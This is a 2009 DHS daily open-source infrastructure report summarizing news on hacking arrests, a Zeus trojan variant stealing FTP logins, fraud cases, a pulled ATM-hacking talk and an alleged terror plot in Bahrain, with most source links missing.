Department of Homeland Security Daily Open Source Infrastructure Report

Thursday, July 2, 2009

Complete DHS Daily Report for July 2, 2009

Daily Report

Top Stories

 The Dallas Business Journal reports that a man was arrested on June 26 by federal authorities who accuse him of using his contract security guard post at the Carrell Clinic in Dallas, Texas to hack into the clinic’s computers, compromising various hospital systems while planning a larger attack on the system’s computers. (See item 28)

28. June 30, Dallas Business Journal – (Texas) Carrell Clinic computer hacker arrested. An Arlington, Texas, man has been arrested by federal authorities who accuse him of using his contract security guard post at the Carrell Clinic in Dallas to hack into the clinic’s computers, compromising various hospital systems while planning a larger attack on the system’s computers. The defendant, who is also known as the hacker “GhostExodus” and “PhantomExodizzmo” was arrested by the FBI Friday, according to a statement released by the acting U.S. Attorney for the Northern District of Texas. He is charged in the indictment with computer intrusion, but could be facing additional charges depending on the outcome of a grand jury’s investigation, a spokeswoman for the U.S. Attorney’s office said Tuesday. Source:

 According to Knight Ridder, U.S. Navy ships at Mina Salman in Bahrain were the target of an alleged terror attack, prosecutors claimed in a Bahrain court on Tuesday. Two Bahrainis were arrested on April 26 when police allegedly seized machine guns, weapons, computer discs, and other evidence from their homes in East Riffa. (See item 30)

30. July 1, Knight Ridder – (International) Bahrain says two targeted U.S. ships. U.S. Navy ships in Bahrain were the target of an alleged terror attack, prosecutors claimed in court Tuesday. Two Bahrainis, accused of smuggling weapons into the country, planned to attack U.S. ships and personnel at Mina Salman, say prosecutors. The two men, aged 22 and 21, were arrested on April 26 when police allegedly seized machine guns, weapons, computer discs and other evidence from their homes in East Riffa. Both appeared for the first time Tuesday before the High Criminal Court, where they denied plotting terror attacks and smuggling weapons and ammunition into the country. Police believe the pair had met abroad with members of a terrorist cell, al-Qaeda. Their arrest came after National Security Agency received information that the 22-year-old unemployed man, of Jordanian origin, had intensified contacts with the cell in Iran. Officers obtained a search warrant and found tapes, CDs, computers, bank statements and exchange company documents in his house. He then led police to the other — a 21-year-old junior customs officer — who possessed the smuggled weapons. Source:


Banking and Finance Sector

11. June 30, eWeek – (National) Hacker Max Ray Butler pleads guilty. A notorious hacker pleaded guilty to wire fraud charges June 29, acknowledging his involvement in the theft of credit card and identity data. The guilty party, of San Francisco, was a former security consultant turned hacker who had been on the radar of law enforcement under his various hacker aliases for years. Convicted in 2001 of hacking into the Department of Defense, he served 18 months in prison. In 2004, he was part of a group of individuals investigated by the FBI and the Secret Service for compromising code in the “Half-Life” video game. Between 2005 until 2007, the guilty party operated a Website called he set up with a partner-in-crime from Los Angeles, and used it to buy and sell stolen credit card data. The partner would then manufacture credit cards with the stolen card information. Other thieves would use the cards to illegally purchase merchandise that would later be resold on eBay. The ring was linked by investigators to the theft of nearly 2 million credit card numbers and $86 million in fraudulent purchases. Source:

12. June 30, Associated Press – (New Jersey) 6 in NJ indicted on mortgage fraud charges. Six people have been indicted on various mortgage fraud-related charges in three separate cases in New Jersey. Among those charged are two women who authorities say used loan application information to obtain more than $1 million in unauthorized mortgages, lines of credit and credit cards. Banks in New Jersey, Pennsylvania and New York were defrauded in the schemes. The New Jersey Attorney General had already filed three civil lawsuits against companies and people it claims were cashing in on the ongoing mortgage crisis. The allegations included charging high fees to homeowners trying to stave off foreclosure. Source:

13. June 30, Associated Press – (Indiana) Ex-pastor sought in Ind. multimillion-dollar fraud. A former pastor and his sons were charged with securities fraud in Indiana on June 30 in what officials said was a multimillion-dollar scheme aimed at church members who thought they were helping build churches but were actually buying the men planes and sports cars. The secretary of state’s office said arrest warrants issued for the ex-pastor and three of his sons charged each with 10 felony counts. The men are accused of duping about 11,000 church members into buying bonds worth $120 million by urging them to support church construction projects, according to a probable cause affidavit. The men said the bonds would be handled by their brokerage firm, Alanar Inc. Prosecutors said the men pocketed about $6 million, bought two airplanes, sports cars and vacations. The ex-pastor also bought Porsches for family members, a spokesman for the Indiana secretary of state said. Most of the men’s victims lived in Indiana. Investigators believe that the men assembled teams of church members to sell bonds to other church members. As the scheme progressed over about five years, the suspects shuffled incoming money between various accounts to hide defaults by churches and their own thefts so they could make scheduled interest payments to investors. Source:

14. June 30, – (National) Juniper pulls ATM hacking presentation from Black Hat. A Juniper Networks Inc. security researcher who planned to demonstrate a way to hack the software of an ATM at the Black Hat Briefings in Las Vegas had his presentation pulled at the request of the ATM vendor. The demonstrator’s “Jackpotting Automated Teller Machines,” presentation, which was to take place on July 30, was pulled from the schedule on June 29. Juniper Networks confirmed the cancellation. In a statement, the vendor said it received a request to pull the presentation from an ATM vendor. “Juniper believes that the demonstrator’s research is important to be presented in a public forum in order to advance the state of security. However, the affected ATM vendor has expressed to us concern about publicly disclosing the research findings before its constituents were fully protected,” Juniper said. “Considering the scope and possible exposure of this issue on other vendors, Juniper decided to postpone the researcher’s presentation until all affected vendors have sufficiently addressed the issues found in his research.” The demonstrator would have demonstrated a way to attack the underlying software of a line of popular new model ATMs. The presentation would have addressed local and remote attack vectors and finished with a live demonstration on an unmodified stock ATM. The hacking technique is unique. Traditional methods to bilk ATMs involve card skimmers or the physical theft of the ATM. Source:,289142,sid14_gci1360597,00.html

Information Technology

38. June 30, InformationWeek – (International) Zeus Trojan variant steals FTP login details. A new Trojan malware has been detected harvesting FTP account information from compromised computers. The number of affected accounts identified by Prevx, a maker of computer security software, rose from 66,000 on June 24 to 74,000 two days later. According to the director of research at Prevx, the Trojan is highly infectious. “We rate this infection as critical,” he said in a blog post on June 28. “The infection has a ‘China Syndrome’ potential. It includes a cyclic infection which leverages infected PCs to programmatically modify hi-volume Web sites to infect additional users who become part of the cycle. More users leads to more discovery of Web site admin credentials which in turn leads to more Web sites being modified to serve the infection which leads to more infected users.” The malware infects visitors to compromised Web sites using malicious JavaScript code. The malicious script redirects visitors to Web sites hosting exploit kits, which test visitors’ computers to find vulnerabilities in installed operating systems and applications to exploit. If a vulnerability is found and successfully exploited, malware is installed, a variant of the Zeus family. It scans compromised machines for FTP credentials and then posts those credentials to a Web server in the Cayman Islands. It also enlists the victim’s computer to further spread the infection. Source:

For another story, see item 40 below

Communications Sector

39. June 30, Agence France-Presse – (International) Russia launches U.S. radio satellite: report. Russia successfully launched a U.S. radio satellite from Russia’s Baikonur cosmodrome in Kazakhstan, Russian news agencies reported on June 30. The Proton-M rocket carrying the Sirius-FM5 satellite “successfully blasted off and shortly after placed it on the sub-orbital trajectory,” space officials quoted by Interfax said. The satellite will fully detach from the rocket’s engine block nine hours after, officials added. Source:

40. June 29, The Register – (International) Mitnick site targeted in DNS attack on Web host. A Web site belonging to a security expert was compromised after hackers managed to access a domain name server maintained by the site’s Web host and redirect visitors to pages that displayed pornographic images. It was the second time in the past few years that a security lapse at has allowed hackers to redirect the site, the security expert told The Register. At time of writing, domain name system records for Mitnick Security have been restored, but some users continue to see the fraudulent Web site because many DNS caches still show the incorrect information. The security expert said, “My site was redirected and now this webhosting provider has to rebuild all their customer boxes.” The attackers never gained access to the server hosting the security expert’s site, and in any event, the site did not contain customer lists or other sensitive information, said the security expert. Source: